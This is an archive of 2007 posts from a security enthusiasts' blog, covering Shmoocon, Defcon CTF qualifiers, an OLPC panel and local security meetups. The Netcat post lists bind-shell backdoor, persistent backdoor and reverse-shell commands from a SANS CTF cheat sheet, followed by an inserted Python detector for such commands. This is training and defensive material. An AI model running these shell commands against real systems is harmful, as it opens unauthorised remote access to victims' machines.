Showing posts with label cons. Show all posts

2.17.2008

Congratulations

Shmoocon IV was a good time for all. A few good talks, lots of good times meeting up with people, and for Alice, Mike, Sean, and Tim it was good old-fashioned hacker fun as all of them played in Shmoocon's annual "Hack or Halo" competition. Now Mike was last year's champion, and tied for first, but it was Tim who came in with the fastest time, and was this year's Hack or Halo winner.


Congratulations to Tim and everyone who participated.

8.12.2007

Since Defcon...

Sorry for the complete lack of updates from me since Defcon. I've had plenty to write up, share, and rant about (as is my wont), but I'm in somewhat of a tenuous circumstance regarding my blogging, so I figure better safe than sorry, and thus I'm keeping my comments to a minimum. Hopefully some of the other Minds will pick up the slack. We shall see.

7.31.2007

All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that only could last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario based ctf brought it all together as many of them were used during the game. Mostly we focused on the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife", Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that, I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possibly remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistent Backdoor:
while [ 1 ]; do nc -l -p [port] -e /bin/sh; done

Reverse Shell:
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0<backpipe | nc [target ip] [target port] 1>backpipe

Traffic Replay:
nc [targetip] [port] < [filename]

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.
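
From the defender's side, the `-e` entries in the cheat sheet above are the ones worth alerting on in process-creation logs. The following is an added example, not part of the original post: a Python triage function over process command lines. The sample lines are constructed, and the flag meanings assume traditional netcat and ncat.

```python
import shlex

NC_NAMES = {"nc", "ncat", "netcat", "nc.exe", "nc.traditional"}
VALUE_FLAGS = "pecwsiq"   # short options that take a value (assumed: traditional nc / ncat)

def classify_nc(cmdline):
    """Classify one process command line; return None if it is not netcat."""
    try:
        argv = shlex.split(cmdline.replace("\\", "/"))   # tolerate Windows paths
    except ValueError:                                   # unbalanced quotes: skip
        return None
    if not argv or argv[0].rsplit("/", 1)[-1].lower() not in NC_NAMES:
        return None
    listen, local_port, exec_target, positional = False, None, None, []
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            flags = arg[1:]                  # covers combined forms such as -lvp
            listen = listen or "l" in flags
            if flags[-1] in VALUE_FLAGS and i + 1 < len(argv):
                value = argv[i + 1]
                if flags[-1] == "p":
                    local_port = value
                elif flags[-1] in "ec":      # a program is attached to the socket
                    exec_target = value
                i += 1                       # skip the consumed value
        elif not arg.startswith("-"):
            positional.append(arg)
        i += 1
    if exec_target:
        kind = "bind-shell" if listen else "reverse-shell"
    else:
        kind = "listener" if listen else "client"
    if listen and local_port:
        port = local_port
    else:
        port = positional[-1] if positional else None
    return {"kind": kind, "port": port, "exec": exec_target}

def triage(cmdlines):
    """Return (index, finding) for every netcat invocation that attaches a program."""
    hits = []
    for idx, line in enumerate(cmdlines):
        finding = classify_nc(line)
        if finding and finding["exec"]:
            hits.append((idx, finding))
    return hits

# Constructed sample of process command lines (not real log data).
SAMPLE = [
    "/usr/sbin/sshd -D",
    "nc -l -p 4444 -e /bin/sh",
    "/bin/nc 10.0.0.5 8080 -e /bin/bash",
    "nc -lvp 9001",
    "nc.exe -l -p 53 -e cmd.exe",
    "nc 10.0.0.5 2222",
    "rsync -e ssh src dst",
]

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE):
        print(idx, finding["kind"], finding["port"], finding["exec"])
```

Shell redirections (`<`, `>`) never reach netcat's argument list, so the file-transfer entries show up only as a plain listener or client and need network or file telemetry to tell apart.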

7.29.2007

At least we're learning

I've spent the past few days taking the SANS 504 course: Hacking Techniques, Exploits, and Incident Handling. I was lucky enough to have the course creator, Ed Skoudis, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.

I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. A short update:

  • I've been in training, busy at work, and abusing Yahoo Pipes, something I'll write more about later.
  • Bacchus has stopped reading anything but Snort alerts, which made Bacon a bit anxious so I think he's trying to make up some new encrypted communication channel. I may help with that a bit.
  • ev3 has been reversing everything she gets her hands on including, I'm pretty sure, her reversing tools.
  • No one's really sure what Narc, GPmidi, Norris, or LogicX have been doing, but that's prolly a good thing.
  • Saijak seems to have forgotten how to use a computer, though with good reason.
Regardless we're all getting stoked for Defcon and various Minds will be making it out there Thursday and Friday. We'll be in the Riviera and around various places. More about our plans to come.

By the way check out Ed's incident handler challenges, fun stuff.

6.10.2007

And the answers please...

Over at Nopsr.us the Underminers (aka 1@stPlace, winners of last year's Defcon CTF) have put up a follow up to last year's CTF quals writeup, which you can find here.

@tlas and his gang do a fantastic job walking through each of the challenges, and a lot can be learned from just taking a look. Even better, they managed to pry the challenge source code out of Kenshoto's hands (a feat they managed to pull off before I did) and have it posted, so that nearly the entire scenario can be recreated for ownage pleasure in your very own home. So go give it a look, you'll learn a bunch.

For those who are curious, Vulnerable Minds did play this year and were quite pleased with our 30 out of 160 finish. In what is the largest Defcon qualification year ever we were stoked to come in the top fifth and had an awesome time. ev3, Narc, LogicX, Bacon, Gpmidi, Bacchus, and myself spent most of the weekend at Akolyte and Saijak's apt, chugging Red Bull, watching Jurassic Park on repeat (seriously Pwnage100 was crap), and hacking to our hearts' content. It was a great weekend, the challenges were excellent, tough but enjoyable, and it was one of the most fun and interesting events I've been a part of.

So props to the Kenshoto guys for a fantastic quals round, to the NopsR.Us/Underminers/1@stplace guys for the fantastic writeups, and to the Minds who dedicated their weekend to playing a fantastic game.

And watch out next year because Vulnerable Minds is coming to break all of your plates!

5.26.2007

Love of the game.

So! The qualifying round of DefCon's infamous Capture the Flag competition is this weekend. I'm excited, and not just because this would be my first CtF experience. The synergy (more or less) of people coming together with different experiences, knowledge, and ways of looking at problems could prove to be a great way to delve deeper into the field of code and code manipulation. (Let's be honest here, when it comes down to it, this is less about offense or defense and more about mental technique.)

This weekend, a group of us will be sharing one apartment, eating each other's food, hacking to the point of exhaustion... I can't think of a better way to spend a random summer weekend, but that could just be me. ;)

In preparation, I've been looking over last year's quals, helpfully posted by last year's team 1@stPlace. I think one of the things that blew me away was the wide range of topics presented, and the variety of exploitable things. XSS? Bitstream analysis? Reverse engineering protocols? Stealing entangled qbits? OK, just kidding about that last one, but it goes to show what an awesome, diverse field infosec can be. And as much as this is about hacking and having fun, I can only wonder what future DefCon CTFs may hold, especially with the dominance of mobile computing...

But the future can wait. This weekend, let teh funz beg!n.

5.23.2007

Getting Involved: CitySec, OWASP, and SUGs! O MY!

It's been an amazingly busy time for the Vulnerable Minds. Plans for Defcon, CTF, Projects, papers, all of them are sucking up time. I have had multiple blog posts in the queue waiting to be finished and posted in all their glory, but I wanted to make a quick post to highlight something that's been important to me lately.

The image of the lonely hacker in a basement is quickly disproved as soon as you meet the very social characters that make up most of the hacking community. As happy as they are sitting around hacking on a neat piece of code they're just as happy going out for a beer and talking about that piece of code with others who share their interests. Any conference is as much about the old friends you meet up with and the new friends you'll make as it is about the technical knowledge you'll gain.

Cons are, depending on your travel schedule and availability, few and far between for most and as a result smaller interest groups have been forming all over the country to support the desire many hackers/infosec professionals have to mix with their peers, share ideas, network, socialize, and just generally cause trouble. Much like 2600 a few years ago these groups seek to give people those opportunities.

Thomas Ptacek has been a huge proponent of these groups, and as such has organized CitySec, a small bulletin board meant to help form and nurture such groups, which I've been happy to be involved in, advocating a Washington DC meetup. Well before the CitySec site was even live Richard Bejtlich, along with other security professionals, started NoVASec (Northern Virginia) as a group for those interested in pure security, and less interested in discussing their CISSP number and GIAC scores and more into talking about what they're actually doing, could meet and talk about security. NoVASec has been excellent, just a bit of a stretch to get to as it's usually fairly far outside Washington DC proper.

Many other groups are also meeting regularly. OWASP has regular meetings, such as those in Washington DC, in various cities for developers, admins, and security folks interested in webapp security. For those more of the CISSP/Security Management mindset there are groups like ISSA-NoVA. The black or grey hat oriented crowd still has more than a few chapters of 2600 that still seem to meet, though I gather they're waning a bit. I'm also known to show up at a Snort Users Group meeting or two, though sadly the NoVA group hasn't had a meeting in a few months. Even many colleges are getting involved, with groups like the Penn State Information Assurance Club, and a similar club at RIT whose name I completely fail to remember.

I guess what I'm trying to say is that it's great the community that's coming up around various areas of the security field, and I've been happy, and encourage others in the security community, to get involved. I speak from experience when I say many of them are just as much fun as the larger conferences, and make great places to make new friends, make contacts, have a good beer, and occasionally learn something.

4.10.2007

T - 65 Days and Counting

The Dark Tangent posted to the Daily Dave list yesterday that the Call for Papers for Defcon is officially open. Any security pros, hackers, lock pickers, or general trouble makers have until June 15 to submit their ideas for sessions that will be seen by throngs of script kiddies, feds, and the aforementioned trouble makers at Defcon 15 this year from August 3rd through 5th.

Now you may have noticed that Vulnerable Minds made a decent splash this year at Shmoocon. Mike was on top of the hacking side of Hack Or Halo by an impressive margin. Mike, Steve D, and Tim also got more than a little press for their release and subsequent recall of Billy Hoffman's Jikto code. Myself and new Mind Corey were both involved with the inaugural Shmoocon Labs. A few people might have also heard of the little talk done by Sean and I towards the end of the con. Regardless Vulnerable Minds had quite the presence and I was proud to be a small part.

With DefCon gearing up we're weighing our options. I know I'm considering working on something to submit for a talk, and a few of the Minds might join me. We're also considering a little of Kenshoto's brand of CTF. Or who knows, maybe it'll be good old fashioned talks, hacking, and causing trouble in Las Vegas. Either way it should be a good time and Vulnerable Minds plans to be in the middle of it.

4.01.2007

[Enter Filler Here]

I know I really need to write up my Shmoocon follow up. It's first on the list for today after I get coffee. Until then I offer you this reference to two of my favorite things: security and hip-hop:

From XKCD.

3.28.2007

A Look Back at ShmooCon

In case it hasn’t been evident in our last few posts, a group of us here at VulnerableMinds took a trip down to ShmooCon this past weekend. Personally, this was my first taste of the ‘Con and I must say I was quite impressed. For those of you who still may not be familiar with it, I encourage you to swing by the ShmooCon website.

The main strength of the ‘Con is by far the speakers. There were quite a few novel and impressive ideas shared during these speeches. I am anxiously awaiting the video form of the presentations to be posted at shmoocon.org. Since there were three speakers presenting different materials during each of the time slots, it’s safe to say that I may have missed a few.

I would be remiss in this post if I didn’t highlight the efforts of two of our own - Scott Roberts and Sean Coyne. Scott and Sean, along with Ivan Krstic and Jason Scott, presented on the popular One Laptop Per Child (OLPC) project. The presentation was thoroughly enjoyable and quite thought provoking (of course, I may be slightly biased). Some highlights of the presentation were covered by InfoWorld. Hats off to Scott and Sean for a job well done.


P.S. I bow to the awesomeness of Hack-or-Halo.

3.25.2007

OLPC Releases New Laptop Specs

At the One Laptop Per Child panel today at Shmoocon '07, Ivan Krstic announced that the previously known specs have been updated. The XO had a 366MHz AMD processor with little cache, 128MB RAM, and 512 NAND flash acting as storage. As of today, the machines will now be running the AMD Geode LX-700 at 433MHz. It is a .13 micron chip which runs at 0.8 watts making for some nice battery life when combined with the new experimental LiFePO(4) cells. The RAM and storage have been increased to 256MB and 1024MB respectively. The 7.5" sunlight capable screen has a resolution of 1200x900 mono and 692x520 color at 200 DPI. It uses the draft 802.11s ESS mesh networking and also supports 802.11b/g. Of course, it still has the three USB ports, stereo speakers, 30FPS VGA webcam, SD card slot, and microphone.

Read more about the One Laptop Per Child project here
Read more about the ShmooCon presentation here

Javascript Internal Vulnerability Scanner Source Code

This code was demoed at Shmoocon '07 during the Javascript Malware for a Grey Goo Tomorrow presentation. The code was given to us by our newest mind Mike, and first analyzed by Steve Davis. It allows for client side internal vulnerability scanning through Javascript. It is currently missing a frontend to run it. First one with a front end wins :)

UPDATE 3/25: Source code removed at request of Jikto creator

3.21.2007

For the ISI's out there...

That's Information Security Insomniacs, clever I know.

Well it's late and I've been doing Shmoocon prep work all day. I didn't want to call it a night before I posted something interesting.

While no one would confuse me for a big Microsoft fan there are some things I think they've managed to do very well. Necessity being the mother of invention Microsoft has now developed one of, if not the most, expansive computer security programs in the world. I can't speak for anyone else, but I'm always curious what goes on behind closed doors like that, and in this video documentary of his team Stephen Toulouse really gives you a run of the farm at Microsoft Security Response. Definitely worth a watch.

3.10.2007

Speakin' at Shmoocon

Well, it's official now. From Shmoocon.org:

A Plenary Session on the Security and Social Impact of the One Laptop Per Child program

The Children's Machine, also known as the XO-1 and previously as the $100 Laptop, is a low-cost, power-efficient and durable machine developed by faculty members of the MIT Media Lab at the One Laptop per Child non-profit organization (OLPC). The laptop's purpose is to redefine learning for children in developing countries, particularly those living in the most remote areas and in the poorest of countries, by providing them with access to knowledge and modern forms of education. The laptops contain flash memory instead of hard drives and use a custom operating system based on Fedora Core Linux, which includes a new security architecture called Bitfrost. They are built to utilize wireless mesh networking, a form of mobile ad-hoc networking, to allow machines to communicate without requiring configuration by the user. The laptops will be sold to governments and issued to children by schools on the basis of one laptop per child.

What may be the consequences of such a massive distribution of computers to children in developing nations? A much larger Internet population in a few short years appears to be a certainty. Will tens or hundreds of millions of computers running Linux drastically alter the computer security landscape? What is the potential for the laptops to be abused by criminals or closed and oppressive governments? And how will the Internet affect millions of children who find themselves with access to a world decades ahead of their own culture?


Bio: Sean Coyne

Beginning his career as the only Business School member of Penn State's NSA Center for Information Assurance Excellence, Sean is now a sought-after consultant at Booz Allen Hamilton specializing in Information Security for government clients. Sean's technical know-how coupled with a big picture view has led him to help found the Vulnerable Minds think tank, studying the impact of information security on society.

Bio: Ivan Krstic

LiveJournal doesn't have an angry mood anymore, as Ivan Krstić used it all up. Ivan has been angry on all seven continents.

Bio: Jason Scott

Jason Scott runs TEXTFILES.COM, an online collection of the last 30 years of Bulletin Board System-era history, files and artifacts. He is also the director of "BBS: The Documentary" (www.bbsdocumentary.com), a 3-DVD, 8-episode documentary about the BBS, a project 4 years in the making. He has begun production on GET LAMP (www.getlamp.com), a documentary on text adventures. He speaks on topics of computer history and social commentary at various conferences, including Shmoocon 2006, where he presented a history of hacker conferences. Jason currently lives in Massachusetts, and is secretly in love with Bruce Potter.

Bio: Scott Roberts

An up and coming member of the DC InfoSec community. Scott began his interest in Information Security trying to get access to the Internet in 9th grade computer classes and it has led him to a position as a Global Security Analyst at Symantec Managed Security Services. Along with Vulnerable Minds, a think tank he helped found, Scott is also involved in various projects involving Snort, large scale architectures, and teaching information assurance.

I'm not gonna lie, Sean and I are stoked. This is really shaping up to be a great talk. Jason Scott has done some really great talks before from Shmoocon, Defcon, and others. Not to mention any guy making a profession of love to Bruce Potter can't be bad at all, just amusingly crazy. He's teaming up with Sean to take a look at the sociological, economical, other -ical type things that will come up with the OLPC.

Ivan Krstic, as I have mentioned before, is an unbelievably smart gentleman, not that it's a surprise, I mean he did design Bitfrost (which will be a major topic of our panel). As much as I'm looking forward to speaking with him I'm equally excited to just get the chance to pick his brain as one of the most out of the box people in computer security.

Sean... well I see him most days, but he does have a lot of great angles on this quite interesting issue. It'll be great to hear what he comes prepared with, and even better to hear what he does with the various questions that I'm sure will be thrown his way.

As for my piece I'm planning on tag teaming the technical end of things with Ivan, looking at the implications of such technology on the security space. There is so much to cover around this, both for the kids with the laptops, the world at large, and what lessons can be learned.

It should be a great panel and I'm honored to be with such an esteemed group. So track us down at Shmoocon. I'll be doing another post on Shmoocon later this week but regardless track me down to say hi. I'll be the loud guy with the short hair and the speaker's pass. If you're lucky you may even get one of the new Vulnerable Minds business cards (Thanks again Timoni! The new logos look great!).